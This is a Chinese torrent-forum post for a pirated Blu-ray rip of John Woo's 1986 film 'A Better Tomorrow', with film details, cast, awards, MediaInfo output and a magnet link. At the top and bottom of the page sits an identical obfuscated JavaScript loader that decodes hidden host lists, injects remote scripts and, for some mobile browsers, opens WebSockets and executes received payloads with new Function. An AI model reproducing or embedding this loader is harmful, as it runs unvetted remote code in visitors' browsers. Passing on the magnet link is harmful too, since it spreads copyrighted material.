英雄本色[国粤语配音/中文字幕].A.Better.Tomorrow.1986.1080p.BluRay.x265.10bits.DTS.2Audio 6.29GB

版主小s 1月前 275

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 英雄本色 / A Better Tomorrow / Gangland Boss

◎年 代 1986

◎产 地 中国香港

◎类 别 剧情 / 动作 / 犯罪

◎语 言 粤语 / 汉语普通话 / 英语

◎上映日期 2017-11-17(中国大陆) / 1986-08-02(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt0092263/

◎豆瓣评分 8.6/10 (447376人评价)

◎豆瓣链接 https://movie.douban.com/subject/1297574/

◎片 长 95分钟

◎导 演 吴宇森 John Woo (id:1027853)

◎编 剧 陈庆嘉 Hing-Ka Chan (id:1274234)

吴宇森 John Woo (id:1027853)

梁淑华 Suk-Wah Leung (id:1322098)

◎演 员 周润发 Yun-Fat Chow (id:1044899)

狄龙 Lung Ti (id:1025426)

张国荣 Leslie Cheung (id:1003494)

朱宝意 Emily Chu (id:1042434)

李子雄 Waise Lee (id:1037662)

田丰 Feng Tien (id:1019621)

吴宇森 John Woo (id:1027853)

曾江 Kenneth Tsang (id:1275451)

成奎安 Fui-On Shing (id:1141665)

徐克 Hark Tsui (id:1007152)

陈志辉 Chi Fai Chan (id:1312869)

良鸣 Ming Leung (id:1344354)

顾嘉辉 Joseph Koo (id:1017256)

冯雪瑞 Xuerui Feng (id:1329826)

张济平 Jiping Zhang (id:1329827)

廖静妮 Jingni Liao (id:1322549)

格莱格·斯奈哥夫 Gregory Snegoff (id:1012738)

马汉元 Han-Yuan Ma (id:1369707)

林富伟 Fu-wai Lam (id:1433957)

杜伟和 Wei Ho Tu (id:1360498)

麦伟章 Wai Cheung Mak (id:1361256)

石燕子 Sek Yin-Tsi (id:1053764)

金兴贤 Hing-Yin Kam (id:1327387)

王侠 Hsieh Wang (id:1099924)

梁柏坚 Patrick Leung (id:1275513)

张国梁 Kwok Leung Cheung (id:1349966)

杨瑞麟 Joseph Yeung (id:1348395)

洪新南 Hsin Nan Hung (id:1383214)

曾醒光 Seng-Kwong Chang (id:1383217)

黄炜溏 Wai-tong Wong (id:1359515)

吴宇森 John Woo (id:1027853)

徐克 Hark Tsui (id:1007152)

周国忠 Tony Chow Kwok-Chung (id:1330746)

顾嘉辉 Joseph Koo (id:1017256)

黄永恒 Wing-Hung Wong (id:1300411)

金马 Ma Kam (id:1288057)

雷志良 Chi Leung Lui (id:1290438)

叶锦添 Timmy Yip (id:1301493)

余家安 Bruce Yu (id:1301555)

梁柏坚 Patrick Leung (id:1275513)

董玮 Wai Tung (id:1299617)

柯受良 Sau Leung 'Blacky' Ko (id:1315099)

◎标 签 香港 / 经典 / 黑帮 / 动作 / 小马哥 / 警匪 / 犯罪 / 暴力美学

◎简 介

香港某个国际伪钞集团重要分子宋子豪(狄龙 饰)和Mark(周润发 饰)情同手足,某次宋子豪带手下谭成(李子雄 饰)去台北交易时被其出卖受枪伤被捕入狱,为替好兄弟报仇,Mark孤身赴台,结果被人打成瘸子,江湖地位自此一落千丈,而宋子豪的父亲也在不久丧命。 一向视宋子豪为偶像的宋子杰(张国荣 饰)得知哥哥的真实身份后,对黑社会及他恨之入骨,立誓利用警察身份将黑帮势力斩草除根,宋子豪出狱后不顾苦等他想重创辉煌的Mark的劝阻,决心弃暗投明,无奈得不到宋子杰的谅解。而此时已成帮会老大的谭成欲找宋子豪再合作,遭拒绝后放言会害宋子杰,被逼走投无路,宋子豪决定再与Mark连手共抗强敌。

◎获奖情况 (共20项)

第23届台北金马影展 (1986)

金马奖 最佳剧情片(提名)

金马奖 最佳导演

└──吴宇森 (id:1027853)

金马奖 最佳男主角

└──狄龙 (id:1025426)

金马奖 最佳男主角(提名)

└──周润发 (id:1044899)

金马奖 最佳男配角(提名)

└──李子雄 (id:1037662)

金马奖 最佳摄影

└──黄永恒 (id:1300411)

金马奖 最佳原创配乐(提名)

└──顾嘉辉 (id:1017256)

金马奖 最佳剪辑(提名)

└──金马 (id:1288057)

金马奖 最佳音效

第6届香港电影金像奖 (1987)

最佳电影

最佳导演(提名)

└──吴宇森 (id:1027853)

最佳编剧(提名)

└──吴宇森 (id:1027853)

最佳男主角

└──周润发 (id:1044899)

最佳男主角(提名)

└──狄龙 (id:1025426)

最佳男配角(提名)

└──李子雄 (id:1037662)

最佳新演员(提名)

└──李子雄 (id:1037662)

最佳摄影(提名)

└──黄永恒 (id:1300411)

最佳剪接(提名)

└──金马 (id:1288057)

最佳美术指导(提名)

└──雷志良 (id:1290438)

最佳原创电影音乐(提名)

└──顾嘉辉 (id:1017256)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 326153655202336476481630839209359632545 (0xF55EE8BAF1E5AB043BF26E08BCA8E8A1)

  4. Complete name : A[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.29 GiB

  8. Duration : 1 h 35 min

  9. Overall bit rate : 9 472 kb/s

  10. Movie name : A Better Tomorrow 1986

  11. Encoded date : UTC 2021-10-14 12:16:01

  12. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 34 min

  23. Bit rate : 7 337 kb/s

  24. Width : 1 916 pixels

  25. Height : 1 068 pixels

  26. Display aspect ratio : 16:9

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.150

  33. Stream size : 4.85 GiB (77%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=19.5000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541049583 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1916x1068 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Language : English

  37. Default : Yes

  38. Forced : No


  39. Audio #1

  40. ID : 2

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 1 h 35 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 509 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : C L R Ls Rs LFE

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 16 bits

  52. Compression mode : Lossy

  53. Stream size : 1.00 GiB (16%)

  54. Title : Cantonese

  55. Language : Chinese

  56. Default : Yes

  57. Forced : No


  58. Audio #2

  59. ID : 3

  60. Format : AC-3

  61. Format/Info : Audio Coding 3

  62. Commercial name : Dolby Digital

  63. Codec ID : A_AC3

  64. Duration : 1 h 35 min

  65. Bit rate mode : Constant

  66. Bit rate : 640 kb/s

  67. Channel(s) : 6 channels

  68. Channel layout : L R C LFE Ls Rs

  69. Sampling rate : 48.0 kHz

  70. Frame rate : 31.250 FPS (1536 SPF)

  71. Compression mode : Lossy

  72. Stream size : 435 MiB (7%)

  73. Title : Mandarin

  74. Language : Chinese

  75. Service kind : Complete Main

  76. Default : Yes

  77. Forced : No


  78. Text #1

  79. ID : 4

  80. ID in the original source medium : 4608 (0x1200)

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 32 min

  86. Bit rate : 29.5 kb/s

  87. Count of elements : 1655

  88. Stream size : 19.5 MiB (0%)

  89. Title : cht

  90. Language : Chinese

  91. Default : Yes

  92. Forced : No

  93. Original source medium : Blu-ray


  94. Text #2

  95. ID : 5

  96. ID in the original source medium : 4609 (0x1201)

  97. Format : PGS

  98. Muxing mode : zlib

  99. Codec ID : S_HDMV/PGS

  100. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  101. Duration : 1 h 32 min

  102. Bit rate : 22.5 kb/s

  103. Count of elements : 1653

  104. Stream size : 14.9 MiB (0%)

  105. Language : English

  106. Default : Yes

  107. Forced : No

  108. Original source medium : Blu-ray


  109. Menu #1

  110. 00:00:00.000 : :第 01 章

  111. 00:04:09.082 : :第 02 章

  112. 00:07:49.928 : :第 03 章

  113. 00:11:45.788 : :第 04 章

  114. 00:14:45.760 : :第 05 章

  115. 00:18:33.779 : :第 06 章

  116. 00:25:06.255 : :第 07 章

  117. 00:29:33.689 : :第 08 章

  118. 00:34:48.128 : :第 09 章

  119. 00:40:59.874 : :第 10 章

  120. 00:46:43.968 : :第 11 章

  121. 00:51:31.130 : :第 12 章

  122. 00:55:01.173 : :第 13 章

  123. 01:00:43.682 : :第 14 章

  124. 01:05:08.655 : :第 15 章

  125. 01:10:08.996 : :第 16 章

  126. 01:16:18.157 : :第 17 章

  127. 01:18:48.515 : :第 18 章

  128. 01:23:51.860 : :第 19 章

  129. 01:30:30.550 : :第 20 章


  130. Menu #2

  131. 00:00:00.000 : 第 01 章

  132. 00:04:09.082 : 第 02 章

  133. 00:07:49.927 : 第 03 章

  134. 00:11:45.788 : 第 04 章

  135. 00:14:45.759 : 第 05 章

  136. 00:18:33.779 : 第 06 章

  137. 00:25:06.254 : 第 07 章

  138. 00:29:33.688 : 第 08 章

  139. 00:34:48.127 : 第 09 章

  140. 00:40:59.874 : 第 10 章

  141. 00:46:43.967 : 第 11 章

  142. 00:51:31.129 : 第 12 章

  143. 00:55:01.172 : 第 13 章

  144. 01:00:43.681 : 第 14 章

  145. 01:05:08.654 : 第 15 章

  146. 01:10:08.996 : 第 16 章

  147. 01:16:18.156 : 第 17 章

  148. 01:18:48.515 : 第 18 章

  149. 01:23:51.860 : 第 19 章

  150. 01:30:30.550 : 第 20 章


TAGS 动作 剧情 犯罪

磁力链:
  • magnet:?xt=urn:btih:B6EC6A35F97CDFCC61BD152E843A82A882B29641

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};